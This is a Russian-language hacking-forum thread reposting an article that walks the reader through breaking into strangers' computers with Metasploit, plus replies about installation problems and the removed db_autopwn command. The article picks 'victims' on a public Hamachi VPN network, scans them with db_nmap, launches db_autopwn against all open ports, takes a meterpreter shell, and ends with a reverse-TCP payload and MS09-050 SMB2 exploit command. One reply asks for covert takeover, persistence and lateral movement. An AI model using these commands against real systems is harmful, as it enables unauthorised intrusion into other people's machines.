Статьи Metasploit Framework Episode 1

Discussion in 'Статьи' started by Seymour, 2 Jun 2010.

  1. Seymour

    Seymour New Member

    Joined:
    28 May 2010
    Messages:
    1
    Likes Received:
    4
    Reputations:
    6
    Author: desp0s
    Source: forum.nrg-team.org


    Metasploit Framework Episode 1


    Всем доброго времени суток! Данную статью я посвящаю всеми известному фрэймворку Metasploit. Итак, преступим.

    Скажу сразу, нам понадобится любая версия сканнера Nmap, ну и сам фрэймворк. Скачать который можно на сайте metasploit.com

    На момент написания статьи в виндовой версии metasploit’а уже отсутствовал GUI интерфейс, что радует, а версия ядра была 3.4.1-dev.

    В самом фрэймворке присутствует 552 эксплоита, чем мы и будем пользоваться.

    Существует много разных способов взлома системы, и metasploit даёт нам возможность, не опираясь на какую-либо Ось, взламывать.

    Мы уже установили Nmap и Metasploit, поэтому сразу запускаем msfconsole, которая в винде появилась на рабочем столе, впрочем можно запускать и из рабочей диры. Перед нами диалоговое окно…

    Msf >

    Для начала, необходимо подключить драйвер БД, которую мы создадим чуть позже. Она понадобится нам для хранения данных сканирования Nmap’а.

    Msf > db_driver sqlite3

    Затем нашу БД необходимо создать.

    Msf > db_create Test

    Вместо слова ‘Test’ можно написать любое слово, лишь бы радовало.

    В ответ Метасплоит выведет инфу о том как успешно создалась БД и, впрочем, мы к ней подключились.

    Далее следует недолговременное сканирование хоста (хостов).

    Msf > db_nmap [опции, необходимые для скана] [наш хост]

    Так же отмечу, что довольно проблематична у многих работа с данным фрэймворком, сидящих за NAT’ом.

    Я как раз из их числа, поэтому я подключился к Hamachi (очень популярная VPN). Зашел в сеть Playground’а и начал искать жертву. Всё это из-за того, что адресация в Метасплоите, когда сидишь за NAT’ом, идет на твой внутренний ip, а поскольку мы действуем в рамках сети, адресация идёт на ip, который присвоил нам Hamachi.

    Жертва найдена, и я начал скан.

    Msf > db_nmap 5.68.22.*

    При этом не указывая никаких дополнительных параметров только потому что в этом не было необходимости. Хотя в некоторых случаях без этого не обойтись.

    После недлительного сканирования, Метасплоит выдал мне информацию об удалённом хосте. Выглядела она примерно так:

    Code:
    Nmap scan report for 5.132.63.54
      Host is up (0.096s latency).
      Not shown: 987 closed ports
      PORT      STATE SERVICE
      80/tcp    open  http
      135/tcp   open  msrpc
      139/tcp   open  netbios-ssn
      443/tcp   open  https
      445/tcp   open  microsoft-ds
      2869/tcp  open  unknown
      5357/tcp  open  unknown
      49152/tcp open  unknown
      49153/tcp open  unknown
      49154/tcp open  unknown
      49155/tcp open  unknown
      49156/tcp open  unknown
      49157/tcp open  unknown
      MAC Address: 7A:79:05:84:3F:36 (Unknown)
      Nmap done: 1 IP address (1 host up) scanned in 133.49 seconds
    Увидели порты, открытые на машине…

    Далее, необходимо было убедиться, что данные попали в нашу БД Test.

    Для этого выполняем следующую команду:

    Msf > db_hosts

    Метасплоит отобразит информацию, которую насканил нам Nmap.

    Теперь сам хак.

    Вручную чаще всего не имеет смысла подбирать сплоит, лучше оставить это дело Метасплоиту.

    Msf > db_autopwn –p –e

    Данная строчка означает, что Метасплоит будет атаковать машину по всем открытым портам (параметр –p за это отвечает). Так же он будет атаковать все хосты из нашей БД (параметр -e). Более детально разобраться с параметрами модуля autopwn можно, введя

    Msf > db_autopwn –h

    Итак, после ввода нашей команды

    Msf > db_autopwn –p –e

    Метасплоит принялся за работу… Начался, так сказать взлом. Он обнаружил, что 210 сплоитов подойдут к нашей жертве (должны подойти). Начинка же идёт meterpreter. Это особый, наиболее любимый, плагин, который в нагрузку несёт кучу жутко полезных возможностей.

    После того, как Метасплоит применит все сплоиты, он начнёт их выгружать, здесь следует немного подождать. После полной его остановки, если же взлом прошел удачно, будет выведена информация об установленной сессии. Просмотреть все активные сессии можно командой

    Msf > sessions –l

    Видим, что метасплоит пробил Ось нашей жертвы и появилась сессия с id 1.

    Впрочем бывает такое, он устанавливает даже 2 а то и несколько сессий с жертвой.

    Чтобы войти с ней в непосредственный контакт, необходимо выполнить команду

    Msf > sessions –i [id]
    Msf > sessions –i 1


    Теперь наша строчка выглядит как

    meterpreter>

    Вводим

    meterpreter> help

    видим список доступных команд.

    Далее проверяем наши права в системе

    meterpreter> getuid

    И заходим в cmd

    meterpreter> shell

    Всё, мы в командной строке, далее всё зависит от нашей фантазии….

    Удачного Хака [​IMG]

    Дополнительная инфа:
    Описанным выше способом можно так же взламывать системы не подбором всех возможных сплоитов, а каким-нибудь одним, также можно выбрать подходящий нам Payload (начинку). Чтобы это сделать выполняем команду

    Msf > db_autopwn –p –e –P [указываем Payload] –m [указываем наш сплоит]

    Пример

    Msf > db_autopwn –p –e –P windows/shell/reverse_tcp –m windows/smb/ms09_050_smb2_negotiate_func_index

    =)

    desp0s (c) NRG-Team.org
     
    #1 Seymour, 2 Jun 2010
    Last edited: 2 Jun 2010
  2. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    В блоге метасплойта уже было похожее... не более чем перевод.
     
  3. wh1t3r

    wh1t3r New Member

    Joined:
    31 May 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Спс.
    Будет ли 2й эпизод ?
    возможно ли продолжить с "meterpreter>" ?
    возможно ли описание команд + скрытый от юзера захват машины.. закрепление на ней , и продвижение в глубь "network"a
    с Уважением.
     
  4. Alex_Dreyk

    Alex_Dreyk Member

    Joined:
    28 Oct 2010
    Messages:
    31
    Likes Received:
    7
    Reputations:
    0
    Кто видел ошибку при попытки просканить nmap типа: Failed to open device eth0?
     
  5. Vollkorn

    Vollkorn Member

    Joined:
    6 Nov 2010
    Messages:
    86
    Likes Received:
    15
    Reputations:
    -6
    Слегка заезженная тема уже...но автору всё равно спасибо
     
  6. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    тема стара как мир, в блоге метасплойта этот способ (Automated Exploitation) был описан аж в 2006 году))
    кому интересна тема, читайте blog.metasploit.com, там многое пишут.
     
    #6 shellz[21h], 9 Nov 2010
    Last edited: 9 Nov 2010
  7. D1AV0L

    D1AV0L New Member

    Joined:
    11 Nov 2010
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    я скачал и установил метасплоит 3.5, как им пользоваться? в консоли ничего не пишется, где есть faq? у меня вин7
     
  8. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    из гуи попробуй
     
  9. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    у меня метасплоит в начале установки выдал две ошыбки что то вроде несовместимо с ав и брандмауером и после установки не запускается
    версия 3.5.0
    винда ХР 2002 сп3
    ав авира
    брандмауэр -

    подскажите как исправить?
     
  10. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    ахах надо их вырубитт просто и потом когда будешь сканить они те пол мсф удалят :D
     
  11. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    во время установки я их отключал
     
  12. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    если во время установки отключал то всё ок должно быть но окошко всёравно выскакивает там ок надо нажать помойму непомню уже
     
  13. Oro4imaru

    Oro4imaru New Member

    Joined:
    17 Jul 2010
    Messages:
    16
    Likes Received:
    0
    Reputations:
    0
    все нажимал ок установка прошла а консоль не запускается
     
  14. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    WinPcap может не установился.
     
  15. j-prof

    j-prof Banned

    Joined:
    29 Aug 2010
    Messages:
    321
    Likes Received:
    11
    Reputations:
    -4
    запускал от админа?
     
  16. pablo666

    pablo666 New Member

    Joined:
    6 Apr 2012
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    В метаспойте что с BT 5 идет при вводе команды db_autopwn выводится
    db_autopwn command depricated , я так понимаю что этот плагин отрезали?
     
  17. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    db_autopwn устралера уже пишет мне мета сплоит
    Какой у новой версии анолог этой команде ?